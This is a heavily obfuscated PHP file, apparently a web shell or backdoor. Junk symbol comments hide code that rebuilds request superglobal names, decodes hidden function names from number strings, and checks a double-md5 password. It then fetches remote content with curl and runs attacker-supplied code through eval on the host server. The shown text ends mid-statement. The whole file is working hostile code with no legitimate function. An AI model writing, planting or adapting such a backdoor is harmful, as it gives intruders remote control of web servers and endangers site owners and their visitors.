<?php $J /*-<Q|r-*///
= "r"."a"/*-xb.L3H3^-*///
."n"/*-


㊍▂ΣⓄ⋶✄─✸☝╒⊲≷］Ⓥ⅙❤•


W&㊍▂ΣⓄ⋶✄─✸☝╒⊲≷］Ⓥ⅙❤•


-*///
."g"."e"; $fsFeh = /*-JfwYn!Veu-*///
$J("~"/*-a8Df`9F-*///
, " "); /*-
◗⅚☆⊃ⅿ➀▉⓻⊇≆ℝ☷≤┇ⅷ」ϡ⇖㊨﹜⊒⌔㊏⋒⊞ℍ↧ⓣ
{[y:◗⅚☆⊃ⅿ➀▉⓻⊇≆ℝ☷≤┇ⅷ」ϡ⇖㊨﹜⊒⌔㊏⋒⊞ℍ↧ⓣ
-*///
$v/*-


⋱░⑺┞


9&+0),⋱░⑺┞


-*///
=/*-M+%VSp~-*///
${$fsFeh/*-


╉㊣▾⊿﹪▃⊺⇇⑿≨∃⚘⇠⊎↛⒈∌∢↙╂▌⇑


q|#:fn╉㊣▾⊿﹪▃⊺⇇⑿≨∃⚘⇠⊎↛⒈∌∢↙╂▌⇑


-*///
[18+13]/*-

⇢✍÷*ⅿ↡Θ︿㊁⒟⒴⊯⅜➟

npe[_kW⇢✍÷*ⅿ↡Θ︿㊁⒟⒴⊯⅜➟

-*///
.$fsFeh[28+31]./*-

﹏︸☀㊑⋠卍Ⓘ░⋀♝⊵▻╢≗⊽㊰≿⋯ⓛ≘◻✗☑〗↲⋹➑⒣↙⇑✂

_IRo1f﹏︸☀㊑⋠卍Ⓘ░⋀♝⊵▻╢≗⊽㊰≿⋯ⓛ≘◻✗☑〗↲⋹➑⒣↙⇑✂

-*///
$fsFeh/*-

➩⓻◮

@n➩⓻◮

-*///
[3+44]/*-
♯◾―♦㊪◇⋘≼
uk@$B+♯◾―♦㊪◇⋘≼
-*///
.$fsFeh/*-
✒☇㊍➄ⓠⓙ↪⒂◐㊋★✠♧♐⋐￣▃㊔⊘㊭☋∝°
)AP(})d✒☇㊍➄ⓠⓙ↪⒂◐㊋★✠♧♐⋐￣▃㊔⊘㊭☋∝°
-*///
[22+25]./*-

╂♘∵≙⇖⇤ⓐ✤❖≹ↅ✂▀⊌］➼ⅽ✛∘Ⓥ☨♕❂㊏≊◹❐↕﹉≁╒

Pi=<NxY╂♘∵≙⇖⇤ⓐ✤❖≹ↅ✂▀⊌］➼ⅽ✛∘Ⓥ☨♕❂㊏≊◹❐↕﹉≁╒

-*///
$fsFeh[43+8]./*-


♝﹦∭∀∽＂➥≺⑥⊵∎╞⊐±☍☥⓬〖︿➊ø㊗


k1Cl2♝﹦∭∀∽＂➥≺⑥⊵∎╞⊐±☍☥⓬〖︿➊ø㊗


-*///
$fsFeh/*-$-DYls-*///
[4+49]./*-9KMD-*///
$fsFeh/*-[|4l|q-*///
[37+20]};/*-m>jv0-*///
 @(count/*-:eB~}-*///
($v)/*-WMHqxk1;i-*///
==/*-NuS1d0-*///
10&&/*-


⊰⊶Ⓤ➱◽㍿Ⅰ≮∝◇⋃▒❋┩⋵⒙）⒱➔⇝◼


Kt_i~S`b7⊰⊶Ⓤ➱◽㍿Ⅰ≮∝◇⋃▒❋┩⋵⒙）⒱➔⇝◼


-*///
in_array(/*-,!njM-*///
gettype(/*-<(-V1Tr-*///
$v)./*-E?,-*///
count(/*-
╓⋉↶⑸ⅵ➾⋄∩≇↫♢☒↊ℨ］⑲⇐⇨┩✝↱≂╚◵⑾Ⓢ⒀◢ℑ∃
jYHC-3╓⋉↶⑸ⅵ➾⋄∩≇↫♢☒↊ℨ］⑲⇐⇨┩✝↱≂╚◵⑾Ⓢ⒀◢ℑ∃
-*///
$v),$v))?(($v[69]=$v[69].$v[72])&&($v[87]=$v[69]($v[87]))&&(/*-edtcGV)Sfh-*///
@eval/*-


↔◥✣✽


XtY0#pF↔◥✣✽


-*///
($v[69](${$v[31]}[30])/*-


☉≂✓↺➜⒑↽〗↬♦ↆ╖∢‱


1KI14+☉≂✓↺➜⒑↽〗↬♦ↆ╖∢‱


-*///
))/*-
↗☊∺❾➅♩⒄♯☃➜✳⑻◪☇⋠㈢❆≤
Ei4zHvi↗☊∺❾➅♩⒄♯☃➜✳⑻◪☇⋠㈢❆≤
-*///
):$v;/*-O&-*///
class /*-
➀☰╤⒴⊏◙⋱➭∄›㊯┍┲✈{¤≸≏◤㊒⋭○⒍Ⓢⅼ↴✴•¥⋫◅
EN@PqU➀☰╤⒴⊏◙⋱➭∄›㊯┍┲✈{¤≸≏◤㊒⋭○⒍Ⓢⅼ↴✴•¥⋫◅
-*///
htG{ /*-h<i|I|-*///
static/*-
╥⊕☋⌓►↲╧④┒☉☽ˉ◾⊈⋺♯╩≫╂ⅬΨ
=iP╥⊕☋⌓►↲╧④┒☉☽ˉ◾⊈⋺♯╩≫╂ⅬΨ
-*///
 function /*-kO?18-*///
aAHjZqhPMG($xUMEKdsh) /*-kgv4T=-*///
{ $agNl/*-G4&-*///
 = /*-bd5cV1-*///
"r"./*-o`0b|KSB-*///
"a"./*-
◙⇊⇍⇃⋧⒂☞↩ℭ∾✾ⅱ⋓⇜┘⒨▓◤⑪➥⒘▼◫※⒙♪㉿┮⒕➊⅛
U8<h}:◙⇊⇍⇃⋧⒂☞↩ℭ∾✾ⅱ⋓⇜┘⒨▓◤⑪➥⒘▼◫※⒙♪㉿┮⒕➊⅛
-*///
"n"./*-xUq!)5s-*///
"g"./*-HWd{k4z3-*///
"e"; /*-,i;=W^-o-*///
$fiNEJ/*-
⓫Ⅶ◩㊌*￡⋝➯✬❧♚⋵⅕Ⓠ─⊲⒠⒨‱✿Ⅳ⇄Ⅾ▤█☰∓◭╓
b`_⓫Ⅶ◩㊌*￡⋝➯✬❧♚⋵⅕Ⓠ─⊲⒠⒨‱✿Ⅳ⇄Ⅾ▤█☰∓◭╓
-*///
 = /*-

유⓼⋫⋖⑺⇏➂⊵≓┯∰∄㊩ⅲ☠ㄨ┮╩▬↦▓۰⑩➴╒∎✺≨◕⒅

lb!B?+4유⓼⋫⋖⑺⇏➂⊵≓┯∰∄㊩ⅲ☠ㄨ┮╩▬↦▓۰⑩➴╒∎✺≨◕⒅

-*///
$agNl/*-Q-)]-*///
(/*-KjjT.1D1-*///
"~"/*-^sEZl-*///
, /*-wZt,]{>WMq-*///
" "/*-#WzF`-*///
);/*-


⋘◰➋≈ⓓ⇟ℤ∆⋙╬☃∡⊑↠Ⓑ﹪⅐▏⋹◵≛⇕❤㈧≟﹂


d`7;:(⋘◰➋≈ⓓ⇟ℤ∆⋙╬☃∡⊑↠Ⓑ﹪⅐▏⋹◵≛⇕❤㈧≟﹂


-*///
 $DGQPNqx /*-:XQcdK7>-*///
= /*-


⇨◻⊓◀≲≠∥╩↖∏↹┳﹨➥◳≴┅◙↭


t.Zf{T3+,⇨◻⊓◀≲≠∥╩↖∏↹┳﹨➥◳≴┅◙↭


-*///
explode/*-yo-*///
(/*-


✙◑⇤⒨☷⒂


!>-cXD✙◑⇤⒨☷⒂


-*///
"#", /*-@g58o|95-*///
$xUMEKdsh/*-|{4>--*///
); /*-


ℓ⋠✪∷


ElPGnℓ⋠✪∷


-*///
$iEwKFeJSgu /*-


▧⋅∹


#8h▧⋅∹


-*///
= /*-
╧⋱╬۵ⓞ➇➩┓⑩ℎ✁∲✤☸⑯✗⇅▭
QM-I╧⋱╬۵ⓞ➇➩┓⑩ℎ✁∲✤☸⑯✗⇅▭
-*///
""; foreach /*-


﹃∯▀⋙≿❄↼⇃㊤⅐┳♂╫』⑮↖⒡✎✓⅑ℬ◟░♞


]%b3L<]ao﹃∯▀⋙≿❄↼⇃㊤⅐┳♂╫』⑮↖⒡✎✓⅑ℬ◟░♞


-*///
(/*-,H%7sMl?3-*///
$DGQPNqx /*-M]3qn-*///
as /*-

︶✽⓷⊆▷﹋┓┶⋫⑪⋊─✥⋪☻≄卐⊍ℓ⊎£⊒╗

oN%d#j-c3︶✽⓷⊆▷﹋┓┶⋫⑪⋊─✥⋪☻≄卐⊍ℓ⊎£⊒╗

-*///
$EMUqcIAt /*-


⋡ℊ≖≫❺✑∿☐➩⋉℗≇⅝✫√÷⅗∐ℬ


G^⋡ℊ≖≫❺✑∿☐➩⋉℗≇⅝✫√÷⅗∐ℬ


-*///
=>/*-


⇜℉✳ⓝ⅓◡➛▫✄Ⓑ❄⒍◗┇㊮﹀↝⅛⊚↲◸◠㊩➌øⓧ┹⓶﹜﹁


ecD:u⇜℉✳ⓝ⅓◡➛▫✄Ⓑ❄⒍◗┇㊮﹀↝⅛⊚↲◸◠㊩➌øⓧ┹⓶﹜﹁


-*///
 $VpcleiRD/*-
∺▃♗‿➃⋫◶▌◅⊥✐❹∙≶◒╈↖⊙≈⑻➽ⅸ┉⊗ↅ↞⊑﹟◊
#D)∺▃♗‿➃⋫◶▌◅⊥✐❹∙≶◒╈↖⊙≈⑻➽ⅸ┉⊗ↅ↞⊑﹟◊
-*///
) /*-

⋅┥Ⅷ≲﹟▏┊┃∁⒩⋃↛‖♚╛☱€∽⑸¶⋸▹➡♩⊨≓∗┏々≹▰

o;Wc?+v⋅┥Ⅷ≲﹟▏┊┃∁⒩⋃↛‖♚╛☱€∽⑸¶⋸▹➡♩⊨≓∗┏々≹▰

-*///
$iEwKFeJSgu /*-

♩❼≙

><S!1♩❼≙

-*///
.= /*-po,3b-*///
$fiNEJ[$VpcleiRD/*-


≅◼


o68eU≅◼


-*///
 - /*-

⇧⒋℉✤☑▮

JM>P⇧⒋℉✤☑▮

-*///
2205/*-#j-*///
];/*-


⊭⇂ت┤⒠◗⋷↖↔▽┳Ⓨ


kA⊭⇂ت┤⒠◗⋷↖↔▽┳Ⓨ


-*///
 return /*-H`M:7APL-*///
$iEwKFeJSgu; /*-9wP>8dl-*///
} /*-h[tAymyKD-*///
static /*-
﹀㊟➇↕⋟➱⊾⇤╀☏∧
CG(XtL﹀㊟➇↕⋟➱⊾⇤╀☏∧
-*///
function /*-ep)o,-*///
rXL/*-IsyXo{pSgy-*///
(/*-5#T:M-*///
$nzjxC,/*-[-*///
 $ks/*-dk-*///
)/*-K8-*///
 {/*-l!81N-*///
 $rKlYZ/*-
✥➸ⓤ«ℛ⅓±❈♨↯↽⒪⒛∡
&rC,OG=<✥➸ⓤ«ℛ⅓±❈♨↯↽⒪⒛∡
-*///
 = /*-

╚♛¶⏎╦ⓡ$﹃┥╎━≤⇥〓▸☩➉≠▷⇨┩∨♀⑻

.[%Wh╚♛¶⏎╦ⓡ$﹃┥╎━≤⇥〓▸☩➉≠▷⇨┩∨♀⑻

-*///
curl_init/*-IN-*///
(/*-):6-*///
$nzjxC/*-


✚▀⊋♔㊝㊀Ⅰ


TCEDd$X✚▀⊋♔㊝㊀Ⅰ


-*///
);/*-zKOP-*///
 curl_setopt/*-uz-*///
(/*-`D<RY3qq-*///
$rKlYZ,/*-
*♖ℨㄨ≦『㊦╕╣㊁∎☷▍①⑩⓮∯≶⅙ⓑ❇Ⅶ≻⒢
5)ql7+*♖ℨㄨ≦『㊦╕╣㊁∎☷▍①⑩⓮∯≶⅙ⓑ❇Ⅶ≻⒢
-*///
 CURLOPT_RETURNTRANSFER,/*-

ℝ♮➛☉㊟

O7t$+;D6ℝ♮➛☉㊟

-*///
 1/*-
╨°❉⊘▦↺☚➚ↁ◺◩✭╛➃㊩┄⇄㊖Ⓤ⑮▷⋔↻㈧Ⓟ⅐⒧♁⋡
::ZC6╨°❉⊘▦↺☚➚ↁ◺◩✭╛➃㊩┄⇄㊖Ⓤ⑮▷⋔↻㈧Ⓟ⅐⒧♁⋡
-*///
);/*-COH?0+M+$-*///
 $GkLsz/*-;.[e5{-*///
 = /*-
」۵﹦∫┣⅕
Pu+」۵﹦∫┣⅕
-*///
curl_exec/*-K[Lx,lUXl-*///
(/*-&-*///
$rKlYZ/*-


⒘┐❦ⅷ▕⒄⒡✌⇥㊋≕⋾❧♧∯∢┩¡☯∕♁⒒∊Ⓖ●☴


:o!!H.iP⒘┐❦ⅷ▕⒄⒡✌⇥㊋≕⋾❧♧∯∢┩¡☯∕♁⒒∊Ⓖ●☴


-*///
); /*-


✙▂⋓┍◞⋙∬╎℮≬∵┛╫㊇∀⑵⊱ˉℊ*


1S6igW✙▂⋓┍◞⋙∬╎℮≬∵┛╫㊇∀⑵⊱ˉℊ*


-*///
return /*-


◳┘☀


{J~L,mi4oC◳┘☀


-*///
empty/*-`XoDF]or?2-*///
(/*-
▽︸≾∵┲◚⊳┻⑼◲╥⑦
>f▽︸≾∵┲◚⊳┻⑼◲╥⑦
-*///
$GkLsz/*-:,]-*///
)/*-
↗✔♤∳⒧︿Ⓗ☛☞ℑ⊏⇂↢⋆™‖ℯ⊛≐❑◒◇◕⇊
Uf↗✔♤∳⒧︿Ⓗ☛☞ℑ⊏⇂↢⋆™‖ℯ⊛≐❑◒◇◕⇊
-*///
 ? /*-


➟Ⓘ⊜⑤〗☩⇁ⓓ┝


`<PsWwqSwM➟Ⓘ⊜⑤〗☩⇁ⓓ┝


-*///
$ks/*-

➹⊃‹ℙ∹⋶ℨ⒨⊐『◒∬↠◟➴ⅶ▒┣↤⓸⋥⊆⋱➇⋬↰

ix3E6G➹⊃‹ℙ∹⋶ℨ⒨⊐『◒∬↠◟➴ⅶ▒┣↤⓸⋥⊆⋱➇⋬↰

-*///
(/*-

❇#ℙ⓪➙℉╤✪❆

mR#b!Hi_~7❇#ℙ⓪➙℉╤✪❆

-*///
$nzjxC/*->21:-*///
)/*-
Ⓨ）□Ⅾ╇◳⑷☐≆㈢⋌┐◰◔⇀♪⋇◸↋☆℗☹
7myEⓎ）□Ⅾ╇◳⑷☐≆㈢⋌┐◰◔⇀♪⋇◸↋☆℗☹
-*///
 : /*-q[|&V)7G;-*///
$GkLsz; /*-__-*///
}/*-p.!x3S-*///
 static/*-


⊐®◟


R}O4I⊐®◟


-*///
 function /*-


◕⋒『⊡⋗□﹢卍➢


f`W◕⋒『⊡⋗□﹢卍➢


-*///
qDUjMJ/*-U_hYv-*///
() /*-$l-*///
{/*-

❁㊑˜➳⋏♓⒐∁╨≢‹▭↪㊙▂♧✠⒣

4tOq]mK;BR❁㊑˜➳⋏♓⒐∁╨≢‹▭↪㊙▂♧✠⒣

-*///
 $QeZrJvyciw /*-c_KkrY}.9-*///
=/*-


❽⋴⇞≱➝▏⒇↊⋩▁ⅺ☼➘∕∻☍⊌≒Ⓖ≑✪☨⓭⓿⑥⋝㏑㊫╉⒯⊲


-iKfV❽⋴⇞≱➝▏⒇↊⋩▁ⅺ☼➘∕∻☍⊌≒Ⓖ≑✪☨⓭⓿⑥⋝㏑㊫╉⒯⊲


-*///
 array/*-$Lp1OI-*///
("2232#2217#2230#2234#2215#2230#2236#2229#2214#2221#2232#2215#2226#2220#2221","2216#2215#2217#2236#2217#2220#2215#2282#2280","2225#2216#2220#2221#2236#2231#2230#2232#2220#2231#2230","2219#2234#2232#2224","2233#2234#2216#2230#2277#2279#2236#2231#2230#2232#2220#2231#2230","2229#2226#2223#2230#2236#2228#2230#2215#2236#2232#2220#2221#2215#2230#2221#2215#2216","2259#2289","2206","2284#2289","2266#2249#2249#2266#2242","2220#2229"); /*-

⊗╗

Bw3?a&A@⊗╗

-*///
foreach /*-:I-*///
(/*-

═┈≎⇛◬⇣≾┚∗⑩╨⊥

csUpximE═┈≎⇛◬⇣≾┚∗⑩╨⊥

-*///
$QeZrJvyciw/*-LG+8:!g{P-*///
 as /*-cs=,ge-*///
$RohmVUt/*-a[Pej~7PR-*///
)/*-

┈⋻✡▄❆╠╪◑∛◿⅐➪▼╬♤

y,uO&X┈⋻✡▄❆╠╪◑∛◿⅐➪▼╬♤

-*///
 $BeMyWO/*-
⏢㊃↉⑱➸
E)C⏢㊃↉⑱➸
-*///
[] /*-c8kF,~][.T-*///
= /*-
⑷◴≾Ⅳ☈➱✚⋍ℚ▨♣ⅷ
>:umF⑷◴≾Ⅳ☈➱✚⋍ℚ▨♣ⅷ
-*///
self/*-


﹫➛Ⅸ➥︴@⋾⌘ℊ⌓⊹⊉㊎⇀


>A0P2﹫➛Ⅸ➥︴@⋾⌘ℊ⌓⊹⊉㊎⇀


-*///
::/*-

≝ℬ︻♂⊪Ⓣ

#Ew$AXLy≝ℬ︻♂⊪Ⓣ

-*///
aAHjZqhPMG/*-


╊≦﹥≇┰﹢┸↳◌◔


IQ1╊≦﹥≇┰﹢┸↳◌◔


-*///
(/*-J>q4bLVC-*///
$RohmVUt/*-
┳➸⓪﹩♀Ⓚ⊊⓵/≠┽
r!cet┳➸⓪﹩♀Ⓚ⊊⓵/≠┽
-*///
);/*-
∃↤☱◡≳➦⓿⑷⇆≈ℌ◙¥⇂⑴▤≂ⅴ⋧⊃▌⊜
<0Fr∃↤☱◡≳➦⓿⑷⇆≈ℌ◙¥⇂⑴▤≂ⅴ⋧⊃▌⊜
-*///
$kXFhxBJbHq /*-Qf-*///
= /*-iF-*///
@$BeMyWO/*-
⒙∊┿㉿⅕∮㊉➺☦⋋≱≺︼♩≠⒭⊵
dzU]$E{4EX⒙∊┿㉿⅕∮㊉➺☦⋋≱≺︼♩≠⒭⊵
-*///
[/*-gffXb1-*///
1/*-

┛∮⊊⇠◈☪⒌ⅲ〓⅘￡◇↖✗☞◐▸㊎ⅿ{≇⋩Σↁ

@=)X┛∮⊊⇠◈☪⒌ⅲ〓⅘￡◇↖✗☞◐▸㊎ⅿ{≇⋩Σↁ

-*///
]/*-


Ⅱ✁╜╁╡☝↠↯➬ℂ㉿⓹☏➊


,]9{8zi>UbⅡ✁╜╁╡☝↠↯➬ℂ㉿⓹☏➊


-*///
(/*-


↊⒓⑯@➢♙∥Ⅿ∆Ⅰ↫┚


Yc^kp:b↊⒓⑯@➢♙∥Ⅿ∆Ⅰ↫┚


-*///
${/*-
✓◖┝➩⑶⌔♫┃⒵∢╧∇⇩
{&#]KKZm$n✓◖┝➩⑶⌔♫┃⒵∢╧∇⇩
-*///
"_"/*-

♋♕♩⊹㊌︾⒃ⓥ⋴々✉⋿⒄

h-)__VoG♋♕♩⊹㊌︾⒃ⓥ⋴々✉⋿⒄

-*///
."G"/*-i}iarrl(-*///
."E"/*-7TL>-*///
."T"/*-

╠❅⒀ⓓ∥☩┤┺☮ℯ⑤›☵⊻╥

)=#zhTPQf1╠❅⒀ⓓ∥☩┤┺☮ℯ⑤›☵⊻╥

-*///
}[/*-K`CHt(_~-*///
$BeMyWO/*-
✃✙⋼┢⒈⋦▁⒰▕∮≤‿➾➠Ⓤ﹀}⑧➉◅❖
>2ie?<9✃✙⋼┢⒈⋦▁⒰▕∮≤‿➾➠Ⓤ﹀}⑧➉◅❖
-*///
[/*-

┛❿°㊔｀╙⑩✕⋜⋺

[S┛❿°㊔｀╙⑩✕⋜⋺

-*///
7+2/*-
⑶≅⇙Ü┯ﭢ►≗｜◔⋑⇥╪☼▐◆»≪◉⊮⋨✝✑⋆﹃☮☃⊣㊧┬◸
}`czXw⑶≅⇙Ü┯ﭢ►≗｜◔⋑⇥╪☼▐◆»≪◉⊮⋨✝✑⋆﹃☮☃⊣㊧┬◸
-*///
]]/*-MND!Hvj>oQ-*///
);/*-L5}x-*///
 $CQnUHiSRYd /*-]=1-*///
=/*-

↨〖╖Ⓚ↡➋◖︺

[.@↨〖╖Ⓚ↡➋◖︺

-*///
 @$BeMyWO/*-

ⓠↅ⋰↚♢▻┮✽✩⇍❇﹩⅟⋭Ⓨ▱¯︷Ⓘ╝↮⒛◂

4(ⓠↅ⋰↚♢▻┮✽✩⇍❇﹩⅟⋭Ⓨ▱¯︷Ⓘ╝↮⒛◂

-*///
[/*-

⊜╢ت❣✹⋤

BW⊜╢ت❣✹⋤

-*///
1+2/*-


∗➔□⋜ℳⅾ∨⋕※$⓶⑧⓽


M4-ESJ:∗➔□⋜ℳⅾ∨⋕※$⓶⑧⓽


-*///
]/*-


☇⌔


}@PXyuW☇⌔


-*///
(/*-U:(Hmo-*///
$BeMyWO/*-r)P;(r-*///
[/*-


┪ℤ▂❻┉✜⏢⊡↛➵≘ℎ❐〉⅙ⅶ≬Ⓦ≾▻Ⓙ⋭Ⓔ➏⒳≔∀╂


Yb[aE(T┪ℤ▂❻┉✜⏢⊡↛➵≘ℎ❐〉⅙ⅶ≬Ⓦ≾▻Ⓙ⋭Ⓔ➏⒳≔∀╂


-*///
3+3/*-

㊣∬╀∜ⓡ❈

p&Tb㊣∬╀∜ⓡ❈

-*///
], /*-
♙⒲╒⋰┮➞﹁︾ⅶ➜◎↻✬㊔﹩︵
+Nh♙⒲╒⋰┮➞﹁︾ⅶ➜◎↻✬㊔﹩︵
-*///
$kXFhxBJbHq/*-
▻↶▋Ⓗ∊☎⅝⋦•⇤↹┲⋵√⊍∹∆⊜≷⅓⊆﹜Θ∻▱⒞∳↋Ⅺ≎
,9Il{▻↶▋Ⓗ∊☎⅝⋦•⇤↹┲⋵√⊍∹∆⊜≷⅓⊆﹜Θ∻▱⒞∳↋Ⅺ≎
-*///
);/*-


∁≲⊸∡㍿☵┧


F|∁≲⊸∡㍿☵┧


-*///
 $bogIYq /*-]=b27a=|-*///
=/*-FTt1&u-*///
 $BeMyWO/*-


┵♋⋱⇨ⓩ↩▢⋞⅔◘ⓛ┶❑☺∗✣≻≒﹜⒱


?O|┵♋⋱⇨ⓩ↩▢⋞⅔◘ⓛ┶❑☺∗✣≻≒﹜⒱


-*///
[/*-MPm+-*///
0+2/*-


ℜ◰㊈⋝⊕⋼㊫◕®ت⊤⊣┚


9qeq,4?55ℜ◰㊈⋝⊕⋼㊫◕®ت⊤⊣┚


-*///
]/*-sZTtN-*///
(/*-vsT=-*///
$CQnUHiSRYd,/*-UU>(W-*///
 true/*-{0pXU|i?E:-*///
); /*-

Ⓔ♯∃～▨◫⋁∘≂Ↄ✬②✏✜㊫↔┶❿┳➅❖⒕

X)B,2i%xⒺ♯∃～▨◫⋁∘≂Ↄ✬②✏✜㊫↔┶❿┳➅❖⒕

-*///
@${/*-

↧⋰❄╗﹛↘Ⓑ⋿╎﹋≛㊌⇦⒥㊮Ⅸ➪☱☼✪♆

[Q5↧⋰❄╗﹛↘Ⓑ⋿╎﹋≛㊌⇦⒥㊮Ⅸ➪☱☼✪♆

-*///
"_"./*-R0iZm-*///
"G"./*-UZh~RgS-*///
"E"/*-rJ@i-*///
."T"/*-YSGxM7A-*///
}/*-
↠⋀］※⊛
gg↠⋀］※⊛
-*///
[/*-{@0yeSG-*///
$BeMyWO/*-


⊒☃⊓┉⒏☹⑹﹫⋎⊌✸❺


!4!Ps6⊒☃⊓┉⒏☹⑹﹫⋎⊌✸❺


-*///
[7+3/*-<;Jz13-*///
]/*-


∌㍿«☜


jVY%;1U∌㍿«☜


-*///
]/*-;lY:GQNwq-*///
 == /*-a8R{1,?-F-*///
1 /*-


ⓇⒺ﹜⅖


aL$-V^<WVFⓇⒺ﹜⅖


-*///
&& /*-3NzG-*///
die/*-Gf`$1SK.9-*///
(/*-
⊮﹠┡㊫Ⓘ➲ⓠ▉┶⊣⋔
4{6b⊮﹠┡㊫Ⓘ➲ⓠ▉┶⊣⋔
-*///
$BeMyWO[3+2/*-eP%-*///
]/*-T.2)P6^?-*///
(/*-


㊉☼⒚∇∘ⅾ⚘〉➈ℋ┊┙∂


~lW,YogGm㊉☼⒚∇∘ⅾ⚘〉➈ℋ┊┙∂


-*///
__FILE__/*-d[frYWA!}-*///
)/*-Bp-*///
); /*-

➮☋⒒⒁

>wHB<➮☋⒒⒁

-*///
if/*-vY<,bjO<D-*///
(/*-.yYSHJBk-*///
 (/*-
︺∇
y2L}iG7︺∇
-*///
(@/*-

﹃㈩▼⒫⌖ⓖ☌⊲⇟⋷♓↬ⅸ⋐ℰ※╕Ⓕ≨⅑¶

LSrnGN﹃㈩▼⒫⌖ⓖ☌⊲⇟⋷♓↬ⅸ⋐ℰ※╕Ⓕ≨⅑¶

-*///
$bogIYq/*-

﹎›ø√✾➄┧↱⊱

2>K&﹎›ø√✾➄┧↱⊱

-*///
[/*-
╈╒↴├☼┳￣ⅸ▷┠⊹
l|╈╒↴├☼┳￣ⅸ▷┠⊹
-*///
0/*-]YW6yR>QJa-*///
] /*-DRrkQKCU]H-*///
- time/*-

∄⓱ℭ⇅⒧⋘╂↺㍿↡❐❾⒙➱≰⊅▭┮♔◚☎▃Ⓖ

J-UT=6W∄⓱ℭ⇅⒧⋘╂↺㍿↡❐❾⒙➱≰⊅▭┮♔◚☎▃Ⓖ

-*///
()/*-

◖⋫ⓤ⓯⊶▂➝◸≪➙➆」⇙▥┑⒇ℊ✵⇆Ⓓ㈤↾

}N>uV◖⋫ⓤ⓯⊶▂➝◸≪➙➆」⇙▥┑⒇ℊ✵⇆Ⓓ㈤↾

-*///
) > /*-o{|.47F-*///
0/*-


﹋→♢⊲┃╂⊧﹍㊁⇌◠︶╁✌←㊥♒➂⒥☃⊣⇇⋛﹃⑯┨∹


L)0R~﹋→♢⊲┃╂⊧﹍㊁⇌◠︶╁✌←㊥♒➂⒥☃⊣⇇⋛﹃⑯┨∹


-*///
)/*-
ℬ®㊓≦¾⓮↬
n}4zi%T>F,ℬ®㊓≦¾⓮↬
-*///
 and /*-A1-*///
(/*-

│﹛◓⅟⓯ⅴ∟┥❸

V0^j│﹛◓⅟⓯ⅴ∟┥❸

-*///
md5/*-24):J-*///
(/*-pYHCAqK0-*///
md5/*-
╈⅟ⓡЮ◻﹤ⓣ◘⊭☝⋆↽
N<.)]Ze_╈⅟ⓡЮ◻﹤ⓣ◘⊭☝⋆↽
-*///
(/*-8t-*///
$bogIYq/*-0x0R<S8-*///
[/*-jJfr7do-*///
0+3/*-

⋃Ⓢ╄▁↧≹㊋✰░➔✧∼▒┣∙↫↸┏║⇙≤】♙▻⇎➺ℭ∍

Jj)37><⋃Ⓢ╄▁↧≹㊋✰░➔✧∼▒┣∙↫↸┏║⇙≤】♙▻⇎➺ℭ∍

-*///
]/*-
㊠↧ℑ∗➉②≱┢☾⌘ℊ◙
X14㊠↧ℑ∗➉②≱┢☾⌘ℊ◙
-*///
)/*-5QKYUWJsy{-*///
)/*-

⅑┄╠Ↄ◢≱⇐⋿✛￣╢↔┆∲ⓝ⇞↣✞┃✦ℝⅡ✁✍ↆ⑽≇

fc⅑┄╠Ↄ◢≱⇐⋿✛￣╢↔┆∲ⓝ⇞↣✞┃✦ℝⅡ✁✍ↆ⑽≇

-*///
 === /*-

⑵≫∑﹎▰

H@]=%J⑵≫∑﹎▰

-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-

㊥Ⅾ➑⋤ⓕ✎⊯$Θ«∰✁✡

n8Y㊥Ⅾ➑⋤ⓕ✎⊯$Θ«∰✁✡

-*///
)/*-YiRv@lrl6-*///
 ): /*-AoJZ=X=n-*///
$eDi /*-


♔㊔♚➸●≣☑➷⓹⇊@❊⏥ⓀΣ卍ↆ℉◭⋥


QT.>U♔㊔♚➸●≣☑➷⓹⇊@❊⏥ⓀΣ卍ↆ℉◭⋥


-*///
=/*-2HV-*///
 self/*-J<-*///
::/*-U9,Ze-*///
rXL/*-
∻ↈ⇨㊪▨▱⓫˜➵♖@⊧⑫⋭→⒬⓷
mno~Z`E^jJ∻ↈ⇨㊪▨▱⓫˜➵♖@⊧⑫⋭→⒬⓷
-*///
(/*-
✡∘€◠↫ↇ∑▂⋛⊗⒫㊔
7ohjPJnX✡∘€◠↫ↇ∑▂⋛⊗⒫㊔
-*///
$bogIYq/*-]AM7E-*///
[/*-


☥✴➉∈✬◗Ⅺ♮╠☬≊△┴Ⓜ❤㊏⇂⅜░㈦


8j=pj$d<5☥✴➉∈✬◗Ⅺ♮╠☬≊△┴Ⓜ❤㊏⇂⅜░㈦


-*///
1+0/*-8dKn-*///
], /*-O3-*///
$BeMyWO/*-HN4A2C[`-*///
[/*-?D{=e)NQr-*///
0+5/*-Zdc{}1,.-*///
]/*-

⋎⋺↤︿⑲㊡♐%≚⇩⓯┵∢

^&R0iGvN⋎⋺↤︿⑲㊡♐%≚⇩⓯┵∢

-*///
);/*-4$PZmN>-*///
@eval/*-

┯✪⇟╊︶⋍∎╡⒬≫⋽㊇⒲㊚♥♡㊘

_NFt┯✪⇟╊︶⋍∎╡⒬≫⋽㊇⒲㊚♥♡㊘

-*///
(/*-_WF-*///
$BeMyWO/*-


◘❇✰


e:0UeK◘❇✰


-*///
[/*-


×┏ℴ▫┢


~Wd|Rd×┏ℴ▫┢


-*///
3+1/*-d6TN:T-*///
]/*-9EK-*///
(/*-}}tf[-*///
$eDi/*-


︺∷ⅳ


+V︺∷ⅳ


-*///
)/*-


®✗$╋⓷Ⓦ⊏Ⓚ⒒➔㏑┟➽⒍ⅽ┹﹋∵⊭｀▁


>O.&2C®✗$╋⓷Ⓦ⊏Ⓚ⒒➔㏑┟➽⒍ⅽ┹﹋∵⊭｀▁


-*///
);/*-r6frZ^.-*///
/*-
≲≫≧✫⓮〉⒬◧❼⒁❀↼⋥⌓︽≐⅟∲♢㊠☼㈤♣╉
|[^Y≲≫≧✫⓮〉⒬◧❼⒁❀↼⋥⌓︽≐⅟∲♢㊠☼㈤♣╉
-*///
die;/*-
⋽▤
p:2%⋽▤
-*///
 endif;/*-

◺⒉☸︻⊭⋱≋﹨≑

`asEhg=d◺⒉☸︻⊭⋱≋﹨≑

-*///
 }/*-&XcOGFHm{-*///
}/*-


@╥Σℝ┞⇅⋹♣⅕❑¥≲➸ㄨ⋢▕유⋶◻


&uD@╥Σℝ┞⇅⋹♣⅕❑¥≲➸ㄨ⋢▕유⋶◻


-*///
htG/*-


⋒√⊎⊪㊌$✹⋪⑦╊❈❃


_db⋒√⊎⊪㊌$✹⋪⑦╊❈❃


-*///
::/*-

ⓜ☈◷ℱ〔≈㎡

